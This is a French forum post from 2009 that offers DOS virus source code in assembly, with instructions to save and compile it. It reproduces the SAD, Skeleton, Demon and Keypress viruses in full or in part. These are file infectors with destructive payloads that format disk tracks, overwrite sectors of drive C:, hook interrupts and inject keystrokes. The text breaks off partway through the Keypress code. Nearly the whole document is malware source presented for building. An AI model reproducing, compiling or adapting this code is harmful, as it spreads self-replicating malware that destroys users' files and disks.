Sujet : Virus | | Posté le 28-11-2009 ŕ 10:11:27
| Virus J'ai dressé une liste de quelques virus dont il est important de connaitre les fonctionnalités. Je donnerais aussi des codes sources de virus en assembleur. Bah et si on commençait par les codes sources, pour être sur de bien pouvoir les compiler: transposez les en txt avec Bloc-Notes en copiant collant, et renommez le .txt en .asm puis compilez: SAD virus: ; ; ---- Data Segment Values ---- ; ds:[0f6h] = read buffer location ; ds:[0f8h] = write buffer location ; ds:[0fah] = store length of virus at this location ; ds:[0fch] = store length of file to be infected at this location ; ds:[0feh] = filename of file to infect ; .model tiny .code org 100h ; origin for .com files start: nop ; these two nop instructs will be used by 'Nasty' nop ; to determine if a file is already infected ;****** ;get date ;****** mov ah,2ah ; get the date int 21h ; do it cmp dh,09h ; is it September? jnz do_not_activate ; if NO jmp do_not_activate ;**** ;the nasty bit ;**** ;* ;* 1. Print message ;* lea dx,mess ; print message mov ah,09 ; 'Nasty in September' int 21h ; do it ;**** ;* 2. Destroy disk ;**** mov ah,19h ; get current drive (returned in al) int 21h ; do it mov dl,al ; dl = drive # to be formated mov ah,05 ; disk format function mov cl,01 ; first sector mov ch,00 ; first track mov dh,00 ; head zero mov al,10h ; 10h (16) sectors - 2 tracks int 13h ; do it (overwrite first 16 tracks on currently ; selected disc) do_not_activate: mov cx,80h ; save parameters; set counter to 80h bytes mov si,0080h ; offset in the current data segment of the byte ; to be copied mov di,0ff7fh ; offset to which byte is to be moved rep movsb ; move bytes until cx=0 (decrement cx by 1 each time ; loop is performed is done automatically) ; (increment by 1 of si & di is done automatically) lea ax,begp ; load exit from program offset address into ax mov cx,ax ; " " " " " " " cx sub ax,100h ; subtract start of .com file address (100h) from ax ; ax now contains the length of the virus mov ds:[0fah],ax ; put length of the virus into the data segment at ; offset 0fah add cx,fso ; add fso (5h) to cx (offset address of exit) ; so, cx=cx+5 mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at ; offset 0f8h. ** Start of the write buffer. ADD CX,AX ; add virus length (ax) to cx ????? mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h. ; ** Start of the read buffer mov cx,ax ; mov length of virus into cx lea si,start ; load address of 'start' (start of virus) into ; souce index mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into ; destination index rb: ; cx = counter (length of virus) ; si = offset of byte to be read ; di = offset of where to write byte to ; (auto decrement of cx & increment of si & di) rep movsb ; copy the virus into memory stc ; set the carry flag lea dx,file_type_to_infect ; set infector for .com files only mov ah,4eh ; find first file with specified params mov cx,20h ; files with archive bit set int 21h ; do it ; if file found, CF is cleared, else ; CF is set or ax,ax ; works the below instructions (jz & jmp) jz file_found ; if file found jmp file_found jmp done ; if no file found, jmp done (exit virus) file_found: mov ah,2fh ; get dta (returned in es:bx) int 21h ; do it mov ax,es:[bx+1ah] ; mov size of file to be infected into ax mov ds:[0fch],ax ; mov filesize into ds:[0fch] add bx,1eh ; bx now points to asciz filename mov ds:[0feh],bx ; mov filename into ds:[0feh] clc ; clear carry flag mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename) mov dx,bx ; mov filename into dx int 21h ; do it (ax contains file handle) mov bx,ax ; mov file handle into bx mov ax,5700h ; get time & date attribs from file to infect int 21h ; do it (file handle in bx) push cx ; save time to the stack push dx ; save date to the stack mov ah,3fh ; read from file to be infected mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to ; be infected mov dx,ds:[0f6h] ; buffer (where to read bytes to) int 21h ; do it mov bx,dx ; mov buffer location to bx mov ax,[bx] ; mov contents of bx (first two bytes - as bx is ; 16-bits) into ax. ; Now check to see if file is infected... if the ; file is infected, it's first two bytes will be ; 9090h (nop nop) sub ax,9090h ; If file is already infected, zero flag will be set ; thus jump to fin(ish) jz fin mov ax,ds:[0fch] ; mov filesize of file to be infected into ax mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx mov [bx-2],ax ; correct old len mov ah,3ch ; Create file with handle mov cx,00h ; cx=attribs -- set no attributes mov dx,ds:[0feh] ; point to name clc ; clear carry flag int 21h ; create file ; Note: If filename already exists, (which it does) ; truncate the filelength to zero - this is ok as ; we have already copied the file to be infected ; into memory. mov bx,ax ; mov file handle into bx mov ah,40h ; write file with handle (write to the file to be ; infected) - length currently zero ; cx=number of bytes to write mov cx,ds:[0fch] ; length of file to be infected add cx,ds:[0fah] ; length of virus mov DX,ds:[0f8h] ; location of write buffer (this contains the virus ; + the file to be infected) int 21h ; write file ; new file = virus + file to be infected mov ax,5701h ; restore original time & date values pop dx ; get old date from the stack pop cx ; get old time from the stack int 21h ; do it ; Note: Infected file will now carry the time & date ; it had before the infection. mov ah,3eh ; close file (bx=file handle) int 21h ; do it ; Note: date & time stamps automatically updated if ; file written to. fin: stc ; set carry flags mov ah,4fh ; find next file (.com) int 21h ; do it or ax,ax ; decides zero flag outcome jnz done ; if no more .com files, jmp done JMP file_found ; else begin re-infection process for new file. done: mov cx,80h ; set counter (cx) = 80h mov si,0ff7fh ; source offset address (copy from here) mov di,0080h ; destination offset address (copy to here) rep movsb ; copy bytes! (cx is auto decremented by 1 ; si & di are auto incremented by 1) ; Note: this is a 'restore parameters' feature ; this does the reverse of what what done earlier ; in the program (do_not_activate mov ax,0a4f3h ; mov ds:[0fff9h],ax ; mov al,0eah ; mov ds:[0fffbh],al ; reset data segment locations ??? (to previous mov ax,100h ; values before virus infection) mov ds:[0fffch],ax ; lea si,begp ; load exit from program offset address into si lea di,start ; load offset address of start of virus into di mov ax,cs mov ds:[0fffeh],ax ; re-align cs = ds ??? mov kk,ax mov cx,fso db 0eah ; define byte dw 0fff9h ; define word kk dw 0000h ; define kk = word mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display file_type_to_infect db '*?.com',0 ; infect only .com files. fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes ; in size (a word) ; ----- alma mater begp: mov ax,4c00h ; normal dos termination (set al to 00) int 21h ; do it end start Skeleton virus: ; target.asm : [Skeleton] by Deke ; Created wik the Phalcon/Skism Mass-Produced Code Generator ; from the configuration file skeleton.cfg .model tiny ; Handy directive .code ; Virus code segment org 100h ; COM file starting IP id = 'DA' ; ID word for EXE infections entry_point: db 0e9h,0,0 ; jmp decrypt startvirus: decrypt: ; handles encryption and decryption patch_startencrypt: mov bp,offset startencrypt ; start of decryption mov ax,(offset heap - offset startencrypt)/2 ; iterations decrypt_loop: db 2eh,81h,76h,0 ; xor word ptr cs:[bp], xxxx decrypt_value dw 0 ; initialised at zero for null effect inc bp ; calculate new decryption location inc bp dec ax ; If we are not done, then jnz decrypt_loop ; decrypt mo' startencrypt: call next ; calculate delta offset next: pop bp ; bp = IP next sub bp,offset next ; bp = delta offset cmp sp,id ; COM or EXE? je restoreEXE restoreCOM: lea si,[bp+offset save3] mov di,100h push di ; For later return movsb jmp short restoreEXIT restoreEXE: push ds push es push cs ; DS = CS pop ds push cs ; ES = CS pop es lea si,[bp+offset oldCSIP2] lea di,[bp+offset oldCSIP] movsw movsw movsw restoreEXIT: movsw mov byte ptr [bp+numinfec],3 ; reset infection counter mov ah,1Ah ; Set new DTA lea dx,[bp+offset newDTA] ; new DTA @ DS:DX int 21h lea dx,[bp+offset exe_mask] call infect_mask lea dx,[bp+offset com_mask] call infect_mask done_infections: mov ah,1ah ; restore DTA to default mov dx,80h ; DTA in PSP cmp sp,id-4 ; EXE or COM? jz returnEXE returnCOM: int 21h retn ; 100h is on stack returnEXE: pop es pop ds int 21h mov ax,es ; AX = PSP segment add ax,10h ; Adjust for PSP add word ptr cs:[bp+oldCSIP+2],ax add ax,word ptr cs:[bp+oldSSSP+2] cli ; Clear intrpts for stack manipulation mov sp,word ptr cs:[bp+oldSSSP] mov ss,ax sti db 0eah ; jmp ssss:oooo oldCSIP db ? ; Original CS:IP (4 bytes) save3 db 0cdh,20h,0 ; First 3 bytes of COM file oldSSSP dd ? ; Original SS:SP oldCSIP2 dd ? oldSSSP2 dd ? creator db '[MPC]',0 ; Mass Produced Code Generator virus db '[Skeleton]',0 author db 'Deke',0 infect_mask: mov ah,4eh ; find first file mov cx,7 ; any attribute findfirstnext: int 21h ; DS:DX points to mask jc exit_infect_mask ; No mo files found xor cx,cx ; Clear attributes call attributes ; Set file attributes mov ax,3d02h ; Open read/write int 21h xchg ax,bx mov ah,3fh ; Read file to buffer lea dx,[bp+offset buffer] ; @ DS:DX mov cx,1Ah ; 1Ah bytes int 21h mov ax,4202h ; Go to end of file xor cx,cx cwd int 21h cmp word ptr [bp+buffer],'ZM'; EXE? jz checkEXE ; Why yes, yes it is! checkCOM: mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA cmp ax,65535-(endheap-decrypt) ; Is it too large? ja find_next mov cx,word ptr [bp+buffer+1]; get jmp location add cx,heap-startvirus+3 ; Adjust for virus size cmp ax,cx ; Already infected? je find_next jmp infect_com checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? jnz infect_exe done_file: mov ax,5701h ; Restore creation date/time mov cx,word ptr [bp+newDTA+16h] ; time mov dx,word ptr [bp+newDTA+18h] ; date int 21h mov ah,3eh ; Close file int 21h mov ch,0 mov cl,byte ptr [bp+newDTA+15h] ; Restore original call attributes ; attributes cmp byte ptr [bp+numinfec], 0; Enough infections? jnz find_next pop ax ; remove call from stack jmp done_infections find_next: mov ah,4fh ; find next file jmp short findfirstnext exit_infect_mask: ret infect_exe: mov cx, 1ah push cx push bx ; Save file handle les ax,dword ptr [bp+buffer+14h] ; Save old entry point mov word ptr [bp+oldCSIP2], ax mov word ptr [bp+oldCSIP2+2], es les ax,dword ptr [bp+buffer+0Eh] ; Save old stack mov word ptr [bp+oldSSSP2],es mov word ptr [bp+oldSSSP2+2],ax mov ax,word ptr [bp+buffer+8]; Get header size mov cl, 4 ; convert to bytes shl ax, cl xchg ax, bx les ax,dword ptr [bp+newDTA+26] ; Get file size mov dx, es ; to DX:AX push ax push dx sub ax, bx ; Subtract header size from sbb dx, 0 ; file size mov cx, 10h ; Convert to segment:offset div cx ; form mov word ptr [bp+buffer+14h], dx ; New entry point mov word ptr [bp+buffer+16h], ax mov word ptr [bp+buffer+0Eh], ax ; and stack mov word ptr [bp+buffer+10h], id pop dx ; get file length pop ax pop bx ; Restore file handle add ax, heap-startvirus ; add virus size adc dx, 0 mov cl, 9 push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 ; mod 512 mov word ptr [bp+buffer+4], dx ; new file size mov word ptr [bp+buffer+2], ax push cs ; restore ES pop es mov ax,word ptr [bp+buffer+14h] ; needed later jmp short finishinfection infect_com: ; ax = filesize mov cx,3 push cx sub ax,cx lea si,[bp+offset buffer] lea di,[bp+offset save3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax add ax,103h finishinfection: add ax,offset startencrypt-offset decrypt push ax mov ah,2ch ; Get current time int 21h ; dh=sec,dl=1/100 sec mov [bp+decrypt_value],dx ; Set new encryption value lea di,[bp+offset codestore] mov al,55h ; push bp stosb lea si,[bp+offset decrypt] ; Copy encryption function mov cx,startencrypt-decrypt ; Bytes to move push si ; Save for later use push cx rep movsb lea si,[bp+offset write] ; Copy writing function mov cx,endwrite-write ; Bytes to move rep movsb pop cx pop si pop ax push di push si push cx rep movsb ; Copy decryption function mov word ptr [bp+patch_startencrypt+1],ax mov al,5dh ; pop bx stosb mov al,0c3h ; retn stosb call codestore ; decryption pop cx pop di pop si rep movsb ; Restore decryption function mov ax,4200h ; Move file pointer xor cx,cx ; to beginning of file cwd ; xor dx,dx int 21h mov ah,40h ; Write to file lea dx,[bp+offset buffer] ; Write from buffer pop cx ; cx bytes int 21h dec byte ptr [bp+numinfec] ; One mo infection jmp done_file attributes: mov ax,4301h ; Set attributes to cx lea dx,[bp+offset newDTA+30] ; filename in DTA int 21h ret write: pop bp ; Restore relativeness mov ah,40h ; Write to file lea dx,[bp+offset decrypt] ; Concatenate virus mov cx,heap-decrypt ; # bytes to write int 21h push bp endwrite: exe_mask db '*.exe',0 com_mask db '*.com',0 heap: ; Variables not in code ; The following code is the buffer for the write function codestore:db (startencrypt-decrypt)*2+(endwrite-write)+3 dup (?) newDTA db 43 dup (?) ; Temporary DTA numinfec db ? ; Infections this run buffer db 1ah dup (?) ; read buffer endheap: ; End of virus end entry_point Demon Virus: ;========== Demon virus ==================================== 22.09.91 ======== ; ; Assemble and link with: TASM DEMON.VIR ; TLINK DEMON /X/T ; Infect all .COM programs in current directory with: DEMON ; ; !!! NOT ON A TUESDAY !!! ; ;-------------- Constants and structures Tuesday = 2 ; INT 21h, AH=2Ah Search_Rec struc ; directory search record db 21 dup (?) ; reserved for DOS FileAttr db ? ; file attribute FileTime dw ? ; packed file time FileDate dw ? ; packed file date FileSize dd ? ; long file size FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT Search_Rec ends ;-------------- Demon virus segment Virus segment assume cs:Virus,ds:Virus,es:Virus,ss:Virus org 0080h DTA Search_Rec <> ; disk transfer area org 0100h Demon: ; virus entry point Virus_Size = Virus_End - Demon ; virus size = 272 bytes mov dx,offset All_COM ; find first .COM file, mov ah,4eh ; including hidden/system mov cx,110bh int 21h nop jnc Infect ; abort if no files found jmp short Check_Day Infect: call Replicate ; overwrite first 272 bytes mov dx,offset DTA mov ah,4fh ; find next .COM file, int 21h ; go check day if none found nop ; else repeat jnc Next_File jmp short Check_Day Next_File: jmp Infect Check_Day: mov ah,2ah ; get DOS date, check day int 21h cmp al,Tuesday ; Tuesday ? je Thrash_Drive ; if yes, thrash drive C: mov ah,4ch ; else exit to DOS int 21h Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors jmp Write_Sectors ; of drive C: with garbage Write_Sectors: mov al,Drive_C ; Error: doesn't work ! mov cx,160 ; AL=C:, CX=160 sectors mov dx,0 ; DX=highest sector in drive ! mov bx,0 ; DS:BX=start of PSP area int 26h ; overwrite sectors inc Counter cmp Counter,10 ; repeat 10 times je Show_Msg jne Write_Sectors Show_Msg: mov ah,09h ; show a fake error message mov dx,offset Virus_Msg ; and exit to DOS int 21h mov ah,4ch int 21h Replicate: mov dx,offset DTA.FileName ; save file attribute mov ax,4300h int 21h mov COM_Attr,cx nop xor cx,cx ; unprotect the .COM file mov ax,4301h ; in case it's read-only int 21h nop mov ax,3d02h ; open .COM file for R/W, int 21h ; abort on error nop jc Check_Day mov bx,ax ; BX = file handle mov ax,5700h int 21h ; save file date and time nop mov COM_Time,cx mov COM_Date,dx mov dx,offset Demon ; overwrite first 272 bytes mov ah,40h ; of .COM program file mov cx,Virus_Size ; with the virus code int 21h nop mov ax,5701h ; restore file date and time mov dx,COM_Date mov cx,COM_Time int 21h mov ah,3eh ; close the file int 21h nop mov dx,offset DTA.FileName ; restore file attribute mov cx,COM_Attr mov ax,4301h int 21h retn All_COM db '*.COM',0 ; dir search specification COM_Date dw 0 ; packed .COM program date COM_Time dw 0 ; packed .COM program time COM_Attr dw 0 ; .COM program file attribute Counter db 0 ; used when thrashing drive C: Drive_C db 2 ; INT 26h C: drive number dw 0 Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)' dw 0 Virus_Msg db 10,13,'Error eating drive C:',10,13,'$' Virus_End label byte ; virus code+data end Virus ends end Demon Keypress Virus: ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; ;******************************************************** ; Source code of the Keypress Virus - Made by XSTC ; Made in A86 v3.07 ; ; The Keypress Virus installs itself in top of DOS ; memory, without using DOS resident functions. It will ; hook int 1Ch (timer) and 21h (DOS) and will copy every ; 10 minutes during 2 seconds the keys you press five ; times (so if you press '1' it will be '111111') - if ; you press no key, it will usually give ESCs. ; ; In DOS 3+ it spreads to every file executed - so it ; can, besides COM/EXE, infect DRV/OVL/etc. ; It also spreads itself in DOS 1 and 2 with a special ; routine - in this case only COM/EXE files will be ; infected. ; ; It adds, after making full paragraphs of the file ; length, 1232 bytes to COM-files and 1216 to EXE. ; ; This code is only made to show the possibilities and ; dangers of a virus. It is only intended for research ; purposes - spreading a virus is prohibited by law. ; ; NOTE - The compiled code is not 100% compatible with ; the Keypress virus. A86 compiles the 'ADD BX,AX' and ; 'MOV DI,SI' different. This has totally no effect ; on the program. ;******************************************************** ; After compiling the new virus, enter the new size in paragraphs in VirParSize ; and compile again. VirParSize equ 4Ch ; Size of the original KeyPress virus VirStart: jmp long VirBegin db 0 ComStart: mov bx,cs ; When the virus has infected a .COM file, add bx,[102h] ; this is the jump to the virus. Actually, push bx ; this code is overwritten with the code mov bx,offset VirBegin ; in the end of the virus. push bx retf EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file VirSize dw VirParSize shl 4 ; Size of virus in whole pars VirPars dw VirParSize + 1 ; Size of virus in pars+1 MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack) Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File R_Ax dw (?) R_Bx dw (?) R_Cx dw (?) R_Dx dw (?) R_Di dw (?) R_Si dw (?) R_Bp dw (?) R_Es dw (?) R_Ds dw (?) R_SS dw (?) R_SP dw (?) Exe_CS dw (?) Exe_IP dw (?) VirBegin: call Save_Regs ; Start of virus call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files) call Get_cs_ip ; Get CS and IP of original prog call Check_res ; Check virus already resident jb Exit_inst ; Yes, quit call Inst_mem ; Install in memory jb Exit_inst ; Error, quit call Inst_ints ; Hook interrupts Exit_Inst: jmp short Rst_regs_prg nop Jmp_Prg: db 0EAh ; Jump to original program PrgOfs dw (?) PrgSeg dw (?) Check_res: push ds xor bx,bx mov ds,bx mov bx,600h ; Unused word in memory cmp word ptr [bx],1 ; Already installed? jz Installed ; Yes mov word ptr [bx],1 ; No stc Installed: cmc pop ds ret ;*** For .EXE: Fix orig-prog CS and SS *** Fix_cs_ss: test byte ptr [Com_or_exe],1 jz no_exe mov ax,es add ax,10h add Exe_cs,ax add R_ss,ax No_Exe: ret ;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes *** Get_cs_ip: mov ax,[Exe_cs] mov bx,[Exe_ip] test byte ptr [Com_or_exe],1 jnz No_rest ; .EXE file: no restore of first bytes mov ax,es mov bx,100h mov cx,10h mov si,offset First_bytes mov di,100h cld repz ; Restore first 16 bytes (.COM file) movsb No_rest: mov [Prgseg],ax mov [Prgofs],bx ret ;*** Proc: Save the registers to restore them after the virus has ended *** Save_Regs: mov cs:R_ds,ds push cs pop ds mov R_ax,ax mov R_bx,bx mov R_cx,cx mov R_dx,dx mov R_di,di mov R_si,si mov R_bp,bp mov R_es,es ret ;*** Restore regs for original program *** Rst_regs_prg: mov ax,R_ax mov bx,R_bx mov cx,R_cx mov dx,R_dx mov bp,R_bp mov di,R_di mov si,R_si mov es,R_es test byte ptr [Com_or_exe],1 jz No_StackRest ; No stack restore for .COM files cli mov ss,[R_ss] ; Restore .EXE stack mov sp,[R_sp] sti No_StackRest: mov ds,R_ds jmp short jmp_prg ;*** Restore regs for interrupts *** Rst_regs_int: mov ax,R_ax mov bx,R_bx mov cx,R_cx mov dx,R_dx mov bp,R_bp mov di,R_di mov si,R_si mov es,R_es mov ds,R_ds ret ;*** Proc: Search for last MCB *** Last_MCB: push ds mov bx,es dec bx Next_MCB: mov ds,bx cmp byte ptr [0],5Ah ; Last MCB? jz Is_last ; Yes inc bx add bx,[3] ; Go to next cmp bx,0A000h ; In ROM? jb Next_MCB ; No, try next one Is_Last: pop ds ret ;*** Proc: Install virus in end of memory *** Inst_Mem: call Last_mcb ; Search last MCB cmp bx,0A000h ; In ROM? jb Not_ROM ; No, continue No_Inst: push cs ; Yes, quit pop ds stc ; Error, virus not installed ret Not_ROM: mov ds,bx mov ax,[3] ; AX = Size last MCB sub ax,cs:[VirPars] ; - (Virussize in pars+1) jbe no_inst ; Not enough memory, quit cmp ax,800h jb no_inst ; Less than 2048 pars free, quit mov [3],ax ; Give program less space to install virus add bx,ax inc bx ; BX = seg where virus comes mov es:[2],bx ; Enter in PSP, program not allowed there sub bx,10h ; - 10h pars (virus starts at 100h) push bx push cs pop ds pop es mov si,100h mov di,si mov cx,[VirSize] ; CX = virussize cld repz ; Copy virus to virus-segment movsb clc ; No error, virus installed ret ;*** Install new interrupts (1C - Timer Tick, 21 - DOS) *** Inst_Ints: push es pop ds mov word ptr [Ticks],0 mov ax,351Ch ; Get Addr Timer Tick int 21h mov I1c_ofs,bx mov I1c_seg,es mov ax,3521h ; Get Addr DOS-Int int 21h mov I21_ofs,bx mov I21_seg,es mov ax,251Ch mov dx,offset New_I1c int 21h ; Install New Timer-Tick Int mov dx,offset I21_dos12 push dx mov ah,30h ; Get DOS-Version int 21h pop dx cmp al,3 ; Below 3.0? jb DosBel3 mov dx,offset new_I21 ; No, new int DosBel3: mov ax,2521h ; Install new DOS-Int int 21h push cs pop ds ret ;*** Proc: NEW 1C (TIMER TICK) INTERRUPT *** ; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the ; keyboard-interrupt. Ticks dw (?) New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded' cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed? jb org_I1c ; No, go to orig. I1c cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed? jbe screw_keys ; Not yet, give ESCs mov word ptr cs:[Ticks],0 ; Time-counter to 0 jmp short Org_I1c ; Go to orig. I1c Screw_Keys: push cx mov cx,5 ; 5 times / tick Put_Key: int 9 ; Give extra key loop Put_key pop cx Org_I1c: db 0EAh ; Jump far to orig. I1c I1c_Ofs dw (?) I1c_Seg dw (?) New_I24: mov al,0 New_I23: iret I23_Ofs dw (?) I23_Seg dw (?) I24_Ofs dw (?) I24_Seg dw (?) ProgSize dw (?) ; Program size in paragraphs New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 + jz Is_Start jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21 Is_Start: call Save_Regs call InstCritInt ; Install new ^c and crit. err. int mov ax,3D02h ; Open file for read and write mov ds,R_Ds int 21h push cs pop ds jc Close_File mov bx,ax call Read_header jc Close_File call Write_virus jc Close_File call Write_header Close_File: mov ah,3Eh ; Close file int 21h call RestCritInt ; Restore ^c and crit-err ints call Rst_regs_int jmp far dword ptr cs:[I21_Ofs] I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x jz Is_Open JmpDos: db 0EAh ; Jump Far I21_Ofs dw (?) I21_Seg dw (?) Is_Open: push ax ; Network-flags? and al,0FCh pop ax jnz JmpDos ; Yes -> DOS call Save_Regs call InstCritInt ; Install new ^c and crit. err. int mov DS,R_Ds or al,2 ; Write access pushf cli call far cs:[I21_Ofs] ; Open file push cs pop ds jc Open_Error ; Error opening -> DOS pushf mov [R_Ax],ax ; Save handle mov bx,ax call Chk_Inf ; Check infection is possible jc No_Infect ; No -> quit call Read_header jc No_Infect call Write_virus jc No_Infect call Write_header No_Infect: call Go_file_beg ; Go to begin of file call RestCritInt ; Restore ^c and crit-err ints call Rst_regs_int popf retf 2 Open_Error: call RestCritInt ; Restore ^c and crit-err ints call Rst_regs_int jmp short JmpDos ;*** Proc: Buffer for header of program to infect *** Head_buf dw 0Ch dup (?) ;*** Proc: Install new ^C and crit. err. interrupt *** InstCritInt: push ax push bx push dx push ds push es push cs pop ds mov ax,3523h ; Get Ctrl-Break Int Addr int 21h mov I23_Ofs,bx mov I23_Seg,es mov ax,3524h ; Get Crit. Err Int Addr int 21h mov I24_Ofs,bx mov I24_Seg,es mov ax,2523h mov dx,offset New_I23 ; Install new Ctrl-Break Int int 21h mov ax,2524h ; Install new Crit. Err Int mov dx,offset New_I24 int 21h pop es pop ds pop dx pop bx pop ax ret ;*** Proc: Restore orig. ctrl-break and crit. err. interrupt *** RestCritInt: mov ax,2524h ; Rest. orig. crit. err int lds dx,dword ptr cs:[I24_Ofs] int 21h mov ax,2523h ; Rest. orig. ctrl-break int lds dx,dword ptr cs:[I23_Ofs] int 21h push cs pop ds ret ;*** Read header of file *** Read_header: mov ah,3Fh mov dx,offset Head_buf mov cx,18h int 21h jc HeadRead_Err ; Error reading, don't infect call Check_infect ; Check file already infected; if not, save data jc HeadRead_Err ; Error, quit call Calc_data ; Calculate data for infected file jc HeadRead_Err ; Error, quit HeadRead_Err: ret ;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus *** Write_virus: mov ah,40h ; Write virus behind program mov cx,[VirSize] mov dx,100h int 21h jc Err_Writ ; Write error, quit cmp ax,cx jnz Err_Writ ; ' ' ' ' ' ' test byte ptr [Com_or_exe],1 jz First_Write ret First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus mov cx,10h mov dx,offset Head_buf int 21h jc Err_Writ ; Write error, quit cmp ax,cx jnz Err_Writ ; ' ' ' ' ' ' clc ; End procedure, no error ret Err_Writ: stc ; End procedure, error ret ;*** Proc: .COM: Write jump-to-virus, .EXE: Write header *** Write_header: call Go_file_beg ; Go to begin of file test byte ptr [Com_or_exe],1 ; .EXE-file? jnz Exe_header mov ah,40h ; .COM file - Write 'EB 02' mov cx,2 mov dx,offset EB02 int 21h mov ah,40h ; Write program-size in pars mov cx,2 mov dx,offset ProgSize int 21h mov ah,40h ; Write rest of begin of virus mov cx,0Ch mov dx,104h int 21h ret Exe_header: mov ah,40h ; Write in File mov cx,18h mov dx,offset Head_buf int 21h ret ;*** Proc: Change file pointer *** Cng_file_ptr: mov ax,4200h int 21h ret ;*** Proc: Go to begin of file *** Go_file_beg: xor cx,cx ; Filepointer = 0 xor dx,dx call Cng_file_ptr ; Change File Pointer ret ;*** Proc: Check file is already infected *** Check_infect: mov si,104h mov di,offset Head_buf+4 push cs pop es mov byte ptr [Com_or_exe],0 ; Flag for .COM cmp word ptr [di-04],5A4Dh ; Is .EXE? jz Is_Exe mov cx,0Ch ; No, .COM file cld repz ; Already infected? cmpsb jnz Do_Infect ; Not yet Dont_Infect: stc ret Do_Infect: clc ret Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE mov cx,[offset Head_buf+14h] ; cx = Prog-IP cmp cx,offset VirBegin ; Same as Vir-IP? jz Dont_Infect ; Yes, quit cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0? jz Dont_Infect ; Yes, quit mov [Exe_ip],cx ; Save prog-IP mov cx,[Head_buf+16h] mov [Exe_cs],cx ; Save prog-cs mov cx,[Head_buf+0Eh] mov [R_ss],cx ; Save prog-SS mov cx,[Head_buf+10h] mov [R_sp],cx ; Save prog-SP jmp short Do_Infect ;*** Proc: Calculate data for infection *** Calc_data: mov ax,4202h ; Go to EOF xor cx,cx xor dx,dx int 21h test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)? jz No_par_add ; Yes, no extra par added add ax,10h ; Add paragraph adc dx,0 ; Overflow -> Inc dx and ax,0FFF0h ; Make paragraphs No_par_add: test byte ptr [Com_or_exe],1 jnz Calc_exe or dx,dx jnz not_infect cmp ax,[maxcomsize] ; File too big? ja not_infect ; Yes, quit cmp ax,[VirSize] ; File too small? jbe Not_Infect ; Yes, quit mov [ProgSize],ax ; Save program-size mov cl,4 shr word ptr [ProgSize],cl ; In paragraphs mov dx,ax xor cx,cx call Cng_file_ptr ; Go to EOF clc ret Not_Infect: stc ret Calc_exe: push ax push dx add ax,100h ; 100 bytes stack adc dx,0 ; Overflow - inc dx mov cx,dx mov dx,ax call Cng_file_ptr ; Go to EOF push bx add ax,[VirSize] ; New exe-length adc dx,0 mov bx,200h ; For header: / 512 div bx or dx,dx jz No_Correct inc ax ; Files below 2.000.000h bytes - length correction No_Correct: mov [Head_buf+2],dx ; Save new file-length mov [Head_buf+4],ax ; ' ' ' ' ' ' ' ' pop bx pop dx pop ax call Calc_cs_ss mov word ptr [Head_buf+10h],100h ; Prog-SP=100h mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP clc ret ;*** Proc: Calculate new CS and SS for .EXE file *** Calc_cs_ss: push cx mov cx,4 Cs_ss_lp: shr dx,1 rcr ax,1 loop Cs_ss_lp sub ax,[Head_buf+8] ; Size of header sbb dx,0 mov [Head_buf+0Eh],ax ; Save prog-SS mov [Head_buf+16h],ax ; Save prog-cs pop cx ret ;*** Check infection is possible *** Chk_Inf: call Chk_exec ; Check file is executable jb Not_exec call Get_attr ; Check file has no SYS attr Not_Exec: ret ;*** Search-paths *** Com_path db '.COM',0 Exe_path db '.EXE',0 ;*** Check file is executable (.COM / .EXE) Chk_Exec: push es mov es,R_ds mov di,dx xor al,al mov cx,80h cld repnz ; Search '.' scasb jnz not_inf ; No '.' found dec di push di mov si,offset Com_path+4 mov cx,4 std repz ; Check '.COM' cmpsb pop di jnz no_com ; No .COM clc jmp short Infect nop Not_Inf: stc Infect: cld pop es ret No_Com: mov si,offset Exe_path+4 mov cx,4 repz ; Check '.EXE' cmpsb jnz not_inf ; No .EXE either - not executable clc jmp short infect Get_Attr: push ds mov ax,4300h ; Get FileAttr xor cx,cx mov ds,R_ds 